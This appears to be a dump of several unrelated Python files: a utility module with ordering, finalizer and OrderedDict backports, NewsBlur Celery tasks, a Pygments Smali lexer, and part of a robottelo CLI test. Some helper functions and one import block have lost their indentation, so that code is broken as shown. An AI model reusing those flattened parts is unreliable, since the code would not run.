        return "Flags(%s)" % ', '.join(str(flag) for flag in self._enabled)

    def copy(self):
        """Return an independent copy of the same concrete type."""
        duplicate = type(self)()
        duplicate._enabled = set(self._enabled)
        return duplicate

    def __eq__(self, other):
        return isinstance(other, ConfigOptions) and other._enabled == self._enabled

    def __ne__(self, other):
        return not self == other

    def __hash__(self):
        # sorted tuple makes the hash independent of set iteration order
        return hash(tuple(sorted(self._enabled)))
# FIX: the ABC aliases in the `collections` root (collections.Mapping, ...)
# were removed in Python 3.10; use collections.abc where available and fall
# back to the old location on Python 2.
try:
    _Mapping = collections.abc.Mapping
except AttributeError:  # Python 2
    _Mapping = collections.Mapping


class SortedMap(_Mapping):
    """Immutable mapping whose keys iterate in sorted order.

    Built once from an iterable of (key, value) pairs; lookups go through
    a key -> position index into the sorted pair list.
    """

    def __init__(self, seq):
        self._values = []
        self._index = {}
        # sort the (key, value) pairs and remember each key's position
        for i, (k, v) in enumerate(sorted(seq)):
            self._index[k] = i
            self._values.append((k, v))

    def __getitem__(self, k):
        i = self._index[k]
        return self._values[i][1]

    def __len__(self):
        return len(self._values)

    def __iter__(self):
        return iter(k for k, v in self._values)
# FIX: collections.Set was removed from the `collections` root in Python
# 3.10; use collections.abc where available, falling back on Python 2.
try:
    _Set = collections.abc.Set
except AttributeError:  # Python 2
    _Set = collections.Set


class SortedSet(_Set):
    """Immutable set whose elements iterate in sorted order."""

    def __init__(self, seq):
        # keep a real set for O(1) membership plus a sorted list for iteration
        self._set = set(seq)
        self._values = list(sorted(self._set))

    def __contains__(self, item):
        return item in self._set

    def __len__(self):
        return len(self._values)

    def __iter__(self):
        return iter(self._values)
class UniqueDict(dict):
    """A dict that forbids re-assigning an existing key."""

    def __setitem__(self, key, value):
        if key in self:
            raise AssertionError("key already in dictionary: %r" % (key,))
        dict.__setitem__(self, key, value)
class NonReentrantLock(object):
    """
    A lock class which explicitly forbids reentrancy.
    """

    def __init__(self):
        self._lock = threading.Lock()
        self._owner = None  # thread ident of the current holder, or None

    def acquire(self):
        # Fail fast on reentrant acquire: blocking on the plain Lock below
        # from the owning thread would deadlock.
        me = get_ident()
        if me == self._owner:
            raise RuntimeError("cannot re-acquire lock from same thread")
        self._lock.acquire()
        self._owner = me

    def release(self):
        if self._owner != get_ident():
            raise RuntimeError("cannot release un-acquired lock")
        # Ownership is cleared before the underlying lock is released.
        self._owner = None
        self._lock.release()

    def is_owned(self):
        """
        Whether the lock is owned by the current thread.
        """
        return self._owner == get_ident()

    __enter__ = acquire  # context-manager support ('with lock: ...')

    def __exit__(self, t, v, tb):
        self.release()
# Django's cached_property
# see https://docs.djangoproject.com/en/dev/ref/utils/#django.utils.functional.cached_property
class cached_property(object):
    """Non-data descriptor that computes a method's value once per instance.

    The first access calls the wrapped function and stores the result in
    the instance ``__dict__`` under the same name; since instance
    attributes shadow non-data descriptors, later accesses hit the cached
    value directly with no function call.

    The optional ``name`` argument allows caching another method's result,
    e.g. ``url = cached_property(get_absolute_url, name='url')``.
    """

    def __init__(self, func, name=None):
        self.func = func
        if not name:
            name = func.__name__
        self.name = name

    def __get__(self, instance, type=None):
        if instance is None:
            # accessed on the class: expose the descriptor itself
            return self
        value = self.func(instance)
        instance.__dict__[self.name] = value
        return value
def runonce(fn):
    """Decorator: *fn* (a zero-argument callable) executes at most once;
    subsequent calls return the cached result without re-running it."""
    @functools.wraps(fn)
    def wrapper():
        if wrapper._ran:
            return wrapper._result
        # Run and cache; on exception, _ran stays False so a later call retries.
        wrapper._result = fn()
        wrapper._ran = True
        return wrapper._result
    wrapper._ran = False
    return wrapper
def bit_length(intval):
    """
    Return the number of bits necessary to represent integer `intval`.

    Note: unlike int.bit_length(), this counts 0 as one bit, because
    bin(0) renders as '0b0'.
    """
    assert isinstance(intval, INT_TYPES)
    # strip the '0b' prefix and count the remaining binary digits
    binary_digits = bin(abs(intval))[2:]
    return len(binary_digits)
class BenchmarkResult(object):
    """Per-loop timings for a benchmarked callable.

    *records* holds total times for *loop* iterations each; they are
    normalized to per-iteration times, with ``best`` the minimum.
    """

    def __init__(self, func, records, loop):
        self.func = func
        self.loop = loop
        self.records = numpy.array(records) / loop
        self.best = numpy.min(self.records)

    def __repr__(self):
        label = getattr(self.func, "__name__", self.func)
        return "%20s: %10d loops, best of %d: %s per loop" % (
            label, self.loop, self.records.size, format_time(self.best))
def format_time(tm):
    """Render a duration *tm* (seconds) with an auto-selected unit.

    Scales down through s, ms, us, ns and finally ps until the value is
    at least 1 in the chosen unit (ps is used for anything smaller).
    """
    scale = 1
    for suffix in ("s", "ms", "us", "ns"):
        if tm >= scale:
            break
        scale /= 1000
    else:
        suffix = "ps"
    return "%.1f%s" % (tm / scale, suffix)
def benchmark(func, maxsec=1):
    """Time *func* with timeit, auto-scaling the loop count so the whole
    measurement takes roughly *maxsec* seconds; return a BenchmarkResult."""
    timer = timeit.Timer(func)
    number = 1
    result = timer.repeat(1, number)
    # Too fast to be measured
    while min(result) / number == 0:
        number *= 10
        result = timer.repeat(3, number)
    best = min(result) / number
    if best >= maxsec:
        # A single iteration already exceeds the budget: report as-is.
        return BenchmarkResult(func, result, number)
    # Scale it up to make it close the maximum time
    max_per_run_time = maxsec / 3 / number
    number = max(max_per_run_time / best / 3, 1)
    # Round to the next power of 10
    number = int(10 ** math.ceil(math.log10(number)))
    records = timer.repeat(3, number)
    return BenchmarkResult(func, records, number)
# All types that behave like the built-in range, across Python versions.
RANGE_ITER_OBJECTS = (builtins.range,)
if PYVERSION < (3, 0):
    # Python 2: xrange is the lazy range type
    RANGE_ITER_OBJECTS += (builtins.xrange,)
    # python-future's range backport, when the package is installed
    try:
        from future.types.newrange import newrange
        RANGE_ITER_OBJECTS += (newrange,)
    except ImportError:
        pass
# Backported from Python 3.4: functools.total_ordering()
def _not_op(op, other):
# "not a < b" handles "a >= b"
# "not a <= b" handles "a > b"
# "not a >= b" handles "a < b"
# "not a > b" handles "a <= b"
op_result = op(other)
if op_result is NotImplemented:
return NotImplemented
return not op_result
def _op_or_eq(op, self, other):
# "a < b or a == b" handles "a <= b"
# "a > b or a == b" handles "a >= b"
op_result = op(other)
if op_result is NotImplemented:
return NotImplemented
return op_result or self == other
def _not_op_and_not_eq(op, self, other):
# "not (a < b or a == b)" handles "a > b"
# "not a < b and a != b" is equivalent
# "not (a > b or a == b)" handles "a < b"
# "not a > b and a != b" is equivalent
op_result = op(other)
if op_result is NotImplemented:
return NotImplemented
return not op_result and self != other
def _not_op_or_eq(op, self, other):
# "not a <= b or a == b" handles "a >= b"
# "not a >= b or a == b" handles "a <= b"
op_result = op(other)
if op_result is NotImplemented:
return NotImplemented
return not op_result or self == other
def _op_and_not_eq(op, self, other):
# "a <= b and not a == b" handles "a < b"
# "a >= b and not a == b" handles "a > b"
op_result = op(other)
if op_result is NotImplemented:
return NotImplemented
return op_result and self != other
def _is_inherited_from_object(cls, op):
    """
    Whether operator *op* on *cls* is inherited from the root object type.
    """
    if PYVERSION < (3,):
        # Python 2: inherited special methods get fresh unbound-method
        # wrappers, so an identity check fails; but dir() omits methods
        # inherited from object (unlike in 3.x), so absence means inherited.
        return op not in dir(cls)
    # Python 3: the attribute is the very same function object when inherited.
    return getattr(cls, op) is getattr(object, op)
def total_ordering(cls):
    """Class decorator that fills in missing ordering methods

    Backport of Python 3.4's functools.total_ordering(): given a class
    that defines __eq__ and at least one of __lt__/__le__/__gt__/__ge__,
    synthesize the remaining rich-comparison methods in terms of it.
    """
    # For each possible "root" operator, the list of (name, implementation)
    # pairs to install, expressed via the _op helpers above so that
    # NotImplemented propagates correctly.
    convert = {
        '__lt__': [('__gt__',
                    lambda self, other: _not_op_and_not_eq(self.__lt__, self,
                                                           other)),
                   ('__le__',
                    lambda self, other: _op_or_eq(self.__lt__, self, other)),
                   ('__ge__', lambda self, other: _not_op(self.__lt__, other))],
        '__le__': [('__ge__',
                    lambda self, other: _not_op_or_eq(self.__le__, self,
                                                      other)),
                   ('__lt__',
                    lambda self, other: _op_and_not_eq(self.__le__, self,
                                                       other)),
                   ('__gt__', lambda self, other: _not_op(self.__le__, other))],
        '__gt__': [('__lt__',
                    lambda self, other: _not_op_and_not_eq(self.__gt__, self,
                                                           other)),
                   ('__ge__',
                    lambda self, other: _op_or_eq(self.__gt__, self, other)),
                   ('__le__', lambda self, other: _not_op(self.__gt__, other))],
        '__ge__': [('__le__',
                    lambda self, other: _not_op_or_eq(self.__ge__, self,
                                                      other)),
                   ('__gt__',
                    lambda self, other: _op_and_not_eq(self.__ge__, self,
                                                       other)),
                   ('__lt__', lambda self, other: _not_op(self.__ge__, other))]
    }
    # Find user-defined comparisons (not those inherited from object).
    roots = [op for op in convert if not _is_inherited_from_object(cls, op)]
    if not roots:
        raise ValueError(
            'must define at least one ordering operation: < > <= >=')
    root = max(roots)  # prefer __lt__ to __le__ to __gt__ to __ge__
    for opname, opfunc in convert[root]:
        # Only fill in operators the class did not define itself.
        if opname not in roots:
            opfunc.__name__ = opname
            opfunc.__doc__ = getattr(int, opname).__doc__
            setattr(cls, opname, opfunc)
    return cls
# Backported from Python 3.4: weakref.finalize()
from weakref import ref
class finalize:
    """Class for finalization of weakrefable objects
    finalize(obj, func, *args, **kwargs) returns a callable finalizer
    object which will be called when obj is garbage collected. The
    first time the finalizer is called it evaluates func(*arg, **kwargs)
    and returns the result. After this the finalizer is dead, and
    calling it just returns None.
    When the program exits any remaining finalizers for which the
    atexit attribute is true will be run in reverse order of creation.
    By default atexit is true.
    """
    # Finalizer objects don't have any state of their own. They are
    # just used as keys to lookup _Info objects in the registry. This
    # ensures that they cannot be part of a ref-cycle.
    __slots__ = ()
    # Class-level registry: finalizer instance -> _Info record.
    _registry = {}
    # Set during interpreter shutdown to suppress further callbacks.
    _shutdown = False
    # Monotonic counter used to run atexit finalizers in reverse creation order.
    _index_iter = itertools.count()
    # Flag telling _exitfunc to re-scan _registry for new finalizers.
    _dirty = False
    _registered_with_atexit = False
    class _Info:
        # Per-finalizer record; slots keep the record small and ref-cycle free.
        __slots__ = ("weakref", "func", "args", "kwargs", "atexit", "index")
    def __init__(self, obj, func, *args, **kwargs):
        if not self._registered_with_atexit:
            # We may register the exit function more than once because
            # of a thread race, but that is harmless
            import atexit
            atexit.register(self._exitfunc)
            finalize._registered_with_atexit = True
        info = self._Info()
        # The finalizer itself is the weakref callback, so it fires when
        # obj is collected.
        info.weakref = ref(obj, self)
        info.func = func
        info.args = args
        # Store None instead of an empty dict to save memory.
        info.kwargs = kwargs or None
        info.atexit = True
        info.index = next(self._index_iter)
        self._registry[self] = info
        finalize._dirty = True
    def __call__(self, _=None):
        """If alive then mark as dead and return func(*args, **kwargs);
        otherwise return None"""
        # pop() atomically marks the finalizer dead; skip during shutdown.
        info = self._registry.pop(self, None)
        if info and not self._shutdown:
            return info.func(*info.args, **(info.kwargs or {}))
    def detach(self):
        """If alive then mark as dead and return (obj, func, args, kwargs);
        otherwise return None"""
        info = self._registry.get(self)
        obj = info and info.weakref()
        if obj is not None and self._registry.pop(self, None):
            return (obj, info.func, info.args, info.kwargs or {})
    def peek(self):
        """If alive then return (obj, func, args, kwargs);
        otherwise return None"""
        info = self._registry.get(self)
        obj = info and info.weakref()
        if obj is not None:
            return (obj, info.func, info.args, info.kwargs or {})
    @property
    def alive(self):
        """Whether finalizer is alive"""
        return self in self._registry
    @property
    def atexit(self):
        """Whether finalizer should be called at exit"""
        info = self._registry.get(self)
        return bool(info) and info.atexit
    @atexit.setter
    def atexit(self, value):
        info = self._registry.get(self)
        if info:
            info.atexit = bool(value)
    def __repr__(self):
        info = self._registry.get(self)
        obj = info and info.weakref()
        if obj is None:
            return '<%s object at %#x; dead>' % (type(self).__name__, id(self))
        else:
            return '<%s object at %#x; for %r at %#x>' % \
                (type(self).__name__, id(self), type(obj).__name__, id(obj))
    @classmethod
    def _select_for_exit(cls):
        # Return live finalizers marked for exit, oldest first
        L = [(f,i) for (f,i) in cls._registry.items() if i.atexit]
        L.sort(key=lambda item:item[1].index)
        return [f for (f,i) in L]
    @classmethod
    def _exitfunc(cls):
        # At shutdown invoke finalizers for which atexit is true.
        # This is called once all other non-daemonic threads have been
        # joined.
        reenable_gc = False
        try:
            if cls._registry:
                import gc
                if gc.isenabled():
                    reenable_gc = True
                    gc.disable()
                pending = None
                while True:
                    # Re-scan when a finalizer created new finalizers.
                    if pending is None or finalize._dirty:
                        pending = cls._select_for_exit()
                        finalize._dirty = False
                    if not pending:
                        break
                    # pop() from the end => newest-first (reverse creation order).
                    f = pending.pop()
                    try:
                        # gc is disabled, so (assuming no daemonic
                        # threads) the following is the only line in
                        # this function which might trigger creation
                        # of a new finalizer
                        f()
                    except Exception:
                        sys.excepthook(*sys.exc_info())
                    assert f not in cls._registry
        finally:
            # prevent any more finalizers from executing during shutdown
            finalize._shutdown = True
            if reenable_gc:
                gc.enable()
try:
from collections import OrderedDict
except ImportError:
# Copied from http://code.activestate.com/recipes/576693/
# Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
# Passes Python2.7's test suite and incorporates all the latest updates.
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
try:
from _abcoll import KeysView, ValuesView, ItemsView
except ImportError:
pass
class OrderedDict(dict):
    'Dictionary that remembers insertion order'
    # An inherited dict maps keys to values.
    # The inherited dict provides __getitem__, __len__, __contains__, and get.
    # The remaining methods are order-aware.
    # Big-O running times for all methods are the same as for regular dictionaries.
    # The internal self.__map dictionary maps keys to links in a doubly linked list.
    # The circular doubly linked list starts and ends with a sentinel element.
    # The sentinel element never gets deleted (this simplifies the algorithm).
    # Each link is stored as a list of length three: [PREV, NEXT, KEY].
    def __init__(self, *args, **kwds):
        '''Initialize an ordered dictionary. Signature is the same as for
        regular dictionaries, but keyword arguments are not recommended
        because their insertion order is arbitrary.
        '''
        if len(args) > 1:
            raise TypeError('expected at most 1 arguments, got %d' % len(args))
        try:
            # Reuse existing state if __init__ runs more than once
            # (e.g. via pickle or an explicit re-init).
            self.__root
        except AttributeError:
            self.__root = root = []  # sentinel node
            root[:] = [root, root, None]
            self.__map = {}
        self.__update(*args, **kwds)
    def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
        'od.__setitem__(i, y) <==> od[i]=y'
        # Setting a new item creates a new link which goes at the end of the linked
        # list, and the inherited dictionary is updated with the new key/value pair.
        if key not in self:
            root = self.__root
            last = root[0]
            last[1] = root[0] = self.__map[key] = [last, root, key]
        dict_setitem(self, key, value)
    def __delitem__(self, key, dict_delitem=dict.__delitem__):
        'od.__delitem__(y) <==> del od[y]'
        # Deleting an existing item uses self.__map to find the link which is
        # then removed by updating the links in the predecessor and successor nodes.
        dict_delitem(self, key)
        link_prev, link_next, key = self.__map.pop(key)
        link_prev[1] = link_next
        link_next[0] = link_prev
    def __iter__(self):
        'od.__iter__() <==> iter(od)'
        # Walk the linked list forward, yielding keys in insertion order.
        root = self.__root
        curr = root[1]
        while curr is not root:
            yield curr[2]
            curr = curr[1]
    def __reversed__(self):
        'od.__reversed__() <==> reversed(od)'
        # Walk the linked list backward.
        root = self.__root
        curr = root[0]
        while curr is not root:
            yield curr[2]
            curr = curr[0]
    def clear(self):
        'od.clear() -> None.  Remove all items from od.'
        try:
            # Break the link cycles explicitly to help reference counting.
            for node in self.__map.itervalues():
                del node[:]
            root = self.__root
            root[:] = [root, root, None]
            self.__map.clear()
        except AttributeError:
            pass
        dict.clear(self)
    def popitem(self, last=True):
        '''od.popitem() -> (k, v), return and remove a (key, value) pair.
        Pairs are returned in LIFO order if last is true or FIFO order if false.
        '''
        if not self:
            raise KeyError('dictionary is empty')
        root = self.__root
        if last:
            # Unlink the node just before the sentinel (newest).
            link = root[0]
            link_prev = link[0]
            link_prev[1] = root
            root[0] = link_prev
        else:
            # Unlink the node just after the sentinel (oldest).
            link = root[1]
            link_next = link[1]
            root[1] = link_next
            link_next[0] = root
        key = link[2]
        del self.__map[key]
        value = dict.pop(self, key)
        return key, value
    # -- the following methods do not depend on the internal structure --
    def keys(self):
        'od.keys() -> list of keys in od'
        return list(self)
    def values(self):
        'od.values() -> list of values in od'
        return [self[key] for key in self]
    def items(self):
        'od.items() -> list of (key, value) pairs in od'
        return [(key, self[key]) for key in self]
    def iterkeys(self):
        'od.iterkeys() -> an iterator over the keys in od'
        return iter(self)
    def itervalues(self):
        'od.itervalues() -> an iterator over the values in od'
        for k in self:
            yield self[k]
    def iteritems(self):
        'od.iteritems() -> an iterator over the (key, value) items in od'
        for k in self:
            yield (k, self[k])
    def update(*args, **kwds):
        '''od.update(E, **F) -> None.  Update od from dict/iterable E and F.
        If E is a dict instance, does:           for k in E: od[k] = E[k]
        If E has a .keys() method, does:         for k in E.keys(): od[k] = E[k]
        Or if E is an iterable of items, does:   for k, v in E: od[k] = v
        In either case, this is followed by:     for k, v in F.items(): od[k] = v
        '''
        # NOTE: self is taken positionally so a key named 'self' can be
        # passed via **kwds.
        if len(args) > 2:
            raise TypeError('update() takes at most 2 positional '
                            'arguments (%d given)' % (len(args),))
        elif not args:
            raise TypeError('update() takes at least 1 argument (0 given)')
        self = args[0]
        # Make progressively weaker assumptions about "other"
        other = ()
        if len(args) == 2:
            other = args[1]
        if isinstance(other, dict):
            for key in other:
                self[key] = other[key]
        elif hasattr(other, 'keys'):
            for key in other.keys():
                self[key] = other[key]
        else:
            for key, value in other:
                self[key] = value
        for key, value in kwds.items():
            self[key] = value
    __update = update  # let subclasses override update without breaking __init__
    __marker = object()
    def pop(self, key, default=__marker):
        '''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
        If key is not found, d is returned if given, otherwise KeyError is raised.
        '''
        if key in self:
            result = self[key]
            del self[key]
            return result
        # Sentinel object distinguishes "no default given" from default=None.
        if default is self.__marker:
            raise KeyError(key)
        return default
    def setdefault(self, key, default=None):
        'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
        if key in self:
            return self[key]
        self[key] = default
        return default
    def __repr__(self, _repr_running={}):
        'od.__repr__() <==> repr(od)'
        # _repr_running guards against infinite recursion on self-referencing
        # dictionaries; keyed by (id, thread) so it is thread-safe.
        call_key = id(self), _get_ident()
        if call_key in _repr_running:
            return '...'
        _repr_running[call_key] = 1
        try:
            if not self:
                return '%s()' % (self.__class__.__name__,)
            return '%s(%r)' % (self.__class__.__name__, self.items())
        finally:
            del _repr_running[call_key]
    def __reduce__(self):
        'Return state information for pickling'
        items = [[k, self[k]] for k in self]
        inst_dict = vars(self).copy()
        # Strip attributes that belong to the OrderedDict machinery itself.
        for k in vars(OrderedDict()):
            inst_dict.pop(k, None)
        if inst_dict:
            return (self.__class__, (items,), inst_dict)
        return self.__class__, (items,)
    def copy(self):
        'od.copy() -> a shallow copy of od'
        return self.__class__(self)
    @classmethod
    def fromkeys(cls, iterable, value=None):
        '''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
        and values equal to v (which defaults to None).
        '''
        d = cls()
        for key in iterable:
            d[key] = value
        return d
    def __eq__(self, other):
        '''od.__eq__(y) <==> od==y.  Comparison to another OD is order-sensitive
        while comparison to a regular mapping is order-insensitive.
        '''
        if isinstance(other, OrderedDict):
            return len(self)==len(other) and self.items() == other.items()
        return dict.__eq__(self, other)
    def __ne__(self, other):
        return not self == other
    # -- the following methods are only used in Python 2.7 --
    def viewkeys(self):
        "od.viewkeys() -> a set-like object providing a view on od's keys"
        return KeysView(self)
    def viewvalues(self):
        "od.viewvalues() -> an object providing a view on od's values"
        return ValuesView(self)
    def viewitems(self):
        "od.viewitems() -> a set-like object providing a view on od's items"
        return ItemsView(self)
| bsd-2-clause |
AlphaCluster/NewsBlur | apps/profile/tasks.py | 2 | 3437 | import datetime
from celery.task import Task
from apps.profile.models import Profile, RNewUserQueue
from utils import log as logging
from apps.reader.models import UserSubscription, UserSubscriptionFolders
from apps.social.models import MSocialServices, MActivity, MInteraction
class EmailNewUser(Task):
    """Celery task: send the welcome email to a newly registered user."""
    def run(self, user_id):
        # Look up the profile by the owning user's primary key and let the
        # profile model compose and send the mail.
        Profile.objects.get(user__pk=user_id).send_new_user_email()
class EmailNewPremium(Task):
    """Celery task: send the 'thanks for going premium' email to a user."""
    def run(self, user_id):
        # Resolve the profile for this user id and delegate the mailing.
        Profile.objects.get(user__pk=user_id).send_new_premium_email()
class PremiumExpire(Task):
    """Periodic task handling lapsed premium subscriptions: users expired
    2-30 days get a grace-period email; users expired more than 30 days
    are emailed and have premium deactivated."""
    name = 'premium-expire'
    def run(self, **kwargs):
        # Get expired but grace period users
        two_days_ago = datetime.datetime.now() - datetime.timedelta(days=2)
        thirty_days_ago = datetime.datetime.now() - datetime.timedelta(days=30)
        expired_profiles = Profile.objects.filter(is_premium=True,
                                                  premium_expire__lte=two_days_ago,
                                                  premium_expire__gt=thirty_days_ago)
        logging.debug(" ---> %s users have expired premiums, emailing grace..." % expired_profiles.count())
        for profile in expired_profiles:
            # Skip anyone already notified during this grace period.
            if profile.grace_period_email_sent():
                continue
            # setup_premium_history may refresh premium_expire from payment
            # records, so the expiry date is re-checked before emailing.
            profile.setup_premium_history()
            if profile.premium_expire < two_days_ago:
                profile.send_premium_expire_grace_period_email()
        # Get fully expired users
        expired_profiles = Profile.objects.filter(is_premium=True,
                                                  premium_expire__lte=thirty_days_ago)
        logging.debug(" ---> %s users have expired premiums, deactivating and emailing..." % expired_profiles.count())
        for profile in expired_profiles:
            profile.setup_premium_history()
            if profile.premium_expire < thirty_days_ago:
                profile.send_premium_expire_email()
                profile.deactivate_premium()
class ActivateNextNewUser(Task):
    """Celery task: activate the next user waiting in the new-user queue."""
    name = 'activate-next-new-user'
    def run(self):
        RNewUserQueue.activate_next()
class CleanupUser(Task):
    """Celery task: per-user housekeeping -- trim stored read stories,
    interactions and activities, repair subscription folders, and refresh
    the user's Twitter photo."""
    name = 'cleanup-user'
    def run(self, user_id):
        UserSubscription.trim_user_read_stories(user_id)
        UserSubscription.verify_feeds_scheduled(user_id)
        Profile.count_all_feed_subscribers_for_user(user_id)
        MInteraction.trim(user_id)
        MActivity.trim(user_id)
        UserSubscriptionFolders.add_missing_feeds_for_user(user_id)
        UserSubscriptionFolders.compact_for_user(user_id)
        # UserSubscription.refresh_stale_feeds(user_id)
        try:
            ss = MSocialServices.objects.get(user_id=user_id)
        except MSocialServices.DoesNotExist:
            # Not every user has connected social services; nothing more to do.
            logging.debug(" ---> ~FRCleaning up user, can't find social_services for user_id: ~SB%s" % user_id)
            return
        ss.sync_twitter_photo()
class CleanSpam(Task):
    """Celery task: find and purge dead spammer accounts."""
    name = 'clean-spam'
    def run(self, **kwargs):
        logging.debug(" ---> Finding spammers...")
        # confirm=True actually deletes rather than doing a dry run.
        Profile.clear_dead_spammers(confirm=True)
class ReimportStripeHistory(Task):
    """Celery task: re-import recent Stripe payment history (last day,
    capped at 10 records)."""
    name = 'reimport-stripe-history'
    def run(self, **kwargs):
        logging.debug(" ---> Reimporting Stripe history...")
        Profile.reimport_stripe_history(limit=10, days=1)
| mit |
andresguisado/andresguisado.github.io | node_modules/pygmentize-bundled/vendor/pygments/build-2.7/pygments/lexers/dalvik.py | 364 | 3442 | # -*- coding: utf-8 -*-
"""
pygments.lexers.dalvik
~~~~~~~~~~~~~~~~~~~~~~
Pygments lexers for Dalvik VM-related languages.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.lexer import RegexLexer, include, bygroups
from pygments.token import Keyword, Text, Comment, Name, String, Number, \
Punctuation
__all__ = ['SmaliLexer']
class SmaliLexer(RegexLexer):
    """
    For `Smali <http://code.google.com/p/smali/>`_ (Android/Dalvik) assembly
    code.
    *New in Pygments 1.6.*
    """
    name = 'Smali'
    aliases = ['smali']
    filenames = ['*.smali']
    mimetypes = ['text/smali']
    # RegexLexer state machine: the 'root' state tries each included
    # sub-state in order, so more specific patterns must come first.
    tokens = {
        'root': [
            include('comment'),
            include('label'),
            include('field'),
            include('method'),
            include('class'),
            include('directive'),
            include('access-modifier'),
            include('instruction'),
            include('literal'),
            include('punctuation'),
            include('type'),
            include('whitespace')
        ],
        'directive': [
            (r'^[ \t]*\.(class|super|implements|field|subannotation|annotation|'
             r'enum|method|registers|locals|array-data|packed-switch|'
             r'sparse-switch|catchall|catch|line|parameter|local|prologue|'
             r'epilogue|source)', Keyword),
            (r'^[ \t]*\.end (field|subannotation|annotation|method|array-data|'
             'packed-switch|sparse-switch|parameter|local)', Keyword),
            (r'^[ \t]*\.restart local', Keyword),
        ],
        'access-modifier': [
            (r'(public|private|protected|static|final|synchronized|bridge|'
             r'varargs|native|abstract|strictfp|synthetic|constructor|'
             r'declared-synchronized|interface|enum|annotation|volatile|'
             r'transient)', Keyword),
        ],
        'whitespace': [
            (r'\n', Text),
            (r'\s+', Text),
        ],
        'instruction': [
            (r'\b[vp]\d+\b', Name.Builtin),  # registers
            (r'\b[a-z][A-Za-z0-9/-]+\s+', Text),  # instructions
        ],
        'literal': [
            (r'".*"', String),
            (r'0x[0-9A-Fa-f]+t?', Number.Hex),
            (r'[0-9]*\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float),
            (r'[0-9]+L?', Number.Integer),
        ],
        'field': [
            (r'(\$?\b)([A-Za-z0-9_$]*)(:)',
             bygroups(Punctuation, Name.Variable, Punctuation)),
        ],
        'method': [
            (r'<(?:cl)?init>', Name.Function),  # constructor
            (r'(\$?\b)([A-Za-z0-9_$]*)(\()',
             bygroups(Punctuation, Name.Function, Punctuation)),
        ],
        'label': [
            (r':[A-Za-z0-9_]+', Name.Label),
        ],
        'class': [
            # class names in the form Lcom/namespace/ClassName;
            # I only want to color the ClassName part, so the namespace part is
            # treated as 'Text'
            (r'(L)((?:[A-Za-z0-9_$]+/)*)([A-Za-z0-9_$]+)(;)',
             bygroups(Keyword.Type, Text, Name.Class, Text)),
        ],
        'punctuation': [
            (r'->', Punctuation),
            (r'[{},\(\):=\.-]', Punctuation),
        ],
        'type': [
            # Dalvik primitive type descriptors and array marker.
            (r'[ZBSCIJFDV\[]+', Keyword.Type),
        ],
        'comment': [
            (r'#.*?\n', Comment),
        ],
    }
| mit |
omaciel/robottelo | tests/foreman/cli/test_medium.py | 3 | 4480 | # -*- encoding: utf-8 -*-
"""Test for Medium CLI
:Requirement: Medium
:CaseAutomation: Automated
:CaseLevel: Acceptance
:CaseComponent: Hosts
:TestType: Functional
:CaseImportance: High
:Upstream: No
"""
from fauxfactory import gen_alphanumeric
from robottelo.cli.base import CLIReturnCodeError
from robottelo.cli.factory import make_location, make_medium, make_org, make_os
from robottelo.cli.medium import Medium
from robottelo.datafactory import valid_data_list
from robottelo.decorators import tier1, tier2, upgrade
from robottelo.test import CLITestCase
URL = "http://mirror.fakeos.org/%s/$major.$minor/os/$arch"
OSES = [
'Archlinux',
'Debian',
'Gentoo',
'Redhat',
'Solaris',
'Suse',
'Windows',
]
class MediumTestCase(CLITestCase):
    """Test class for Medium CLI"""
    @tier1
    def test_positive_create_with_name(self):
        """Check if Medium can be created
        :id: 4a1caaf8-4401-48cc-85ad-e7189944688d
        :expectedresults: Medium is created
        :CaseImportance: Critical
        """
        # valid_data_list() yields names of various lengths/charsets; each
        # becomes its own subtest so one failure does not mask the rest.
        for name in valid_data_list():
            with self.subTest(name):
                medium = make_medium({'name': name})
                self.assertEqual(medium['name'], name)
    @tier1
    def test_positive_create_with_location(self):
        """Check if medium with location can be created
        :id: cbc6c586-fae7-4bb9-aeb1-e30158f16a98
        :expectedresults: Medium is created and has new location assigned
        :CaseImportance: Medium
        """
        location = make_location()
        medium = make_medium({'location-ids': location['id']})
        self.assertIn(location['name'], medium['locations'])
    @tier1
    def test_positive_create_with_organization_by_id(self):
        """Check if medium with organization can be created
        :id: 631bb6ed-e42b-482a-83f0-f6ce0f20729a
        :expectedresults: Medium is created and has new organization assigned
        :CaseImportance: Medium
        """
        org = make_org()
        medium = make_medium({'organization-ids': org['id']})
        self.assertIn(org['name'], medium['organizations'])
    @tier1
    def test_positive_delete_by_id(self):
        """Check if Medium can be deleted
        :id: dc62c9ad-d2dc-42df-80eb-02cf8d26cdee
        :expectedresults: Medium is deleted
        :CaseImportance: Critical
        """
        for name in valid_data_list():
            with self.subTest(name):
                medium = make_medium({'name': name})
                Medium.delete({'id': medium['id']})
                # info on a deleted medium must fail.
                with self.assertRaises(CLIReturnCodeError):
                    Medium.info({'id': medium['id']})
    # pylint: disable=no-self-use
    @tier2
    def test_positive_add_os(self):
        """Check if Medium can be associated with operating system
        :id: 47d1e6f0-d8a6-4190-b2ac-41b09a559429
        :expectedresults: Operating system added
        :CaseLevel: Integration
        """
        medium = make_medium()
        os = make_os()
        Medium.add_operating_system({
            'id': medium['id'],
            'operatingsystem-id': os['id'],
        })
    @tier2
    @upgrade
    def test_positive_remove_os(self):
        """Check if operating system can be removed from media
        :id: 23b5b55b-3624-440c-8001-75c7c5a5a004
        :expectedresults: Operating system removed
        :CaseLevel: Integration
        """
        medium = make_medium()
        os = make_os()
        Medium.add_operating_system({
            'id': medium['id'],
            'operatingsystem-id': os['id'],
        })
        medium = Medium.info({'id': medium['id']})
        self.assertIn(os['title'], medium['operating-systems'])
        Medium.remove_operating_system({
            'id': medium['id'],
            'operatingsystem-id': os['id'],
        })
        medium = Medium.info({'id': medium['id']})
        self.assertNotIn(os['name'], medium['operating-systems'])
    @tier1
    def test_positive_update_name(self):
        """Check if medium can be updated
        :id: 2111090a-21d3-47f7-bb81-5f19ab71a91d
        :expectedresults: Medium updated
        :CaseImportance: Medium
        """
        new_name = gen_alphanumeric(6)
        medium = make_medium()
        Medium.update({
            'name': medium['name'],
            'new-name': new_name,
        })
        # Re-read to confirm the rename was persisted server-side.
